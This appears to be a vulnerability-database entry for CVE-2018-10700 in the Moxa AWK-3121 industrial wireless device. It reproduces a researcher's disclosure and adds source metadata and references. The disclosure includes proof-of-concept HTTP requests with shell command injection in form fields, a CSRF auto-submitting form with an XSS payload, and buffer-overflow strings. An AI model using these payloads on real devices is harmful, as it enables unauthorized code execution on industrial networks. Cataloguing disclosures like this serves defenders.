[Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n  \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n  Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n   ... 114782935826962\n  Content-Disposition: form-data; name=\"iw_privatePass\"\n \n  ;`ping -c 9 192.168.127.103` ##\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"bkpath\"\n \n  /wireless_cert.asp?index=1\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"certSection\"\n \n  certWlan\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"rfindex\"\n \n  0\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"Submit\"\n \n  Submit\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"certFile1\"\n \n  test.txt\n   ... 114782935826962\n  Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n  Content-Type: text/xml\n \n  \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n   ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n  \u003cbody\n   \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n    \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp          \" /\n   \u003c/form\n   \u003cscript\n   setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n   \u003c/script\n  \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n  Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n   ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n  Content-Type: application/octet-stream\n \n  ls -ltr\n   ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_storage\"\n \n  tftp\n   ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_serverip\"\n \n  `ping -c 3 192.168.127.101`\n   ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"bkpath\"\n \n  /Troubleshooting.asp\n   ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n   \u003cbody\n     \u003cscript\n       function submitRequest()\n       {\n         var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n       }\n     \u003c/script\n     \u003cform action=\"#\"\n       \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n     \u003c/form\n   \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n  Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n  ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n  Content-Type: application/octet-stream\n \n  ls -ltr\n  ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_storage\"\n \n  tftp\n  ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"iw_serverip\"\n \n  AAAAAAAAAAAAAAAAAA (etc.)\n \n  ... 7e21a62f2905ca\n  Content-Disposition: form-data; name=\"bkpath\"\n \n  /Troubleshooting.asp\n  ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "PACKETSTORM",
        "id": "153223"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "153223",
        "trust": 2.7
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700",
        "trust": 2.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-19-337-02",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4544",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-120486",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "PACKETSTORM",
        "id": "153223"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "id": "VAR-201906-0790",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:00:03.613000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.moxa.com/en/"
      },
      {
        "title": "Moxa_AWK_1121",
        "trust": 0.1,
        "url": "https://github.com/samuelhuntley/moxa_awk_1121 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2019/jun/8"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
      },
      {
        "trust": 1.4,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10700"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/samuelhuntley/moxa_awk_1121"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.127.253/forms/websetmainrestart\""
      },
      {
        "trust": 0.1,
        "url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.127.253/forms/iw_websetparameters\""
      },
      {
        "trust": 0.1,
        "url": "http://192.168.127.253/forms/web_certupload\");"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.127.253//systemlog.log"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "PACKETSTORM",
        "id": "153223"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "PACKETSTORM",
        "id": "153223"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "date": "2019-06-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "date": "2019-06-07T22:22:22",
        "db": "PACKETSTORM",
        "id": "153223"
      },
      {
        "date": "2019-06-07T20:29:00.670000",
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "date": "2019-06-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "date": "2019-06-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "date": "2019-12-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "date": "2019-06-10T23:29:02.230000",
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "date": "2019-12-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Moxa AWK-3121 Cross-site scripting vulnerability in devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…